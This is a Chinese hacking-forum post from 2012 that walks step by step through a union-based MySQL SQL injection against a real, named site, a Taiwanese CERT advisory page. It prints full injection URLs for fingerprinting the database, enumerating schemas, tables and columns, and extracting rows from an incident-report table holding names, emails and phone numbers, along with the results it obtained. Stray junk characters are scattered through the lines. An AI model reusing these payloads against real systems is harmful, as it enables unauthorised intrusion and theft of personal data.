找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1831|回复: 0
打印 上一主题 下一主题

.高级暴库方法讲解

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:57:04 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
5 Z# ~2 q5 C) Q) q. u5 e2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解" Z" ?; D# H+ N: F& V
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--1 ~6 f0 [$ d6 r8 m! _$ a
3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--% p2 p1 Q5 U+ C" w1 B3 n: L; c
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。1 Q4 ?# a- L7 k; ^
4.判断有没有写权限# a  c! x% z/ Y) H
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
/ J5 ]5 I# L* ?( t# j没办法,手动猜表啦
; ^; `% L( C$ ^# t  H4 p4 H9 T5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1, D# P: s) V2 p
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
# C+ G6 i3 b' b7 I9 n! c% e- s' Nhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
, H' u, U/ Q, X, [# N, S3 Q成功查出所有数据库,国外的黑客就是不一般。数据库如下:2 K- d" E* @$ b! s. B$ Y
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb/ k5 s: H" b2 o4 r7 X
6.爆表,爆的是twcert库
/ U1 Z, P9 ]# q" g) |http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--( E4 ?* H* i6 C* {3 v0 w
爆出如下表
  b, }3 p  b" h  U1 S; w* r; s! Odownloadfile,irsys,newsdata,secrpt,secrpt_big5
" f- x4 e4 X4 G. z, n7 O7.爆列名,这次爆的是irsys表4 b! Q9 A& m- c
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--" J. [6 J  J4 q7 k8 K; F: e
爆出如下列9 m+ p$ I' L) c% u( q: J9 ]
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
9 |& l7 H# t! q3 _6 b# f8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
  V$ H# E  M. d/ o) i0 n( chttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--& Y' w6 Z9 |8 Y+ e/ b+ d, i) K, o% s  a4 \
返回是3,说明每个列里有3个地段; l* E# g: ?5 q8 Y( @" O
9.爆字段内容$ F: Y4 ]- B0 H! m  C( {, K; S
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
, D( u# N6 j% o% N爆出name列的第一个字段的内容
6 p6 C6 _6 n! i' q( Dhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--& R/ x9 j1 z& \
爆出name列的第二个字段的内容
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表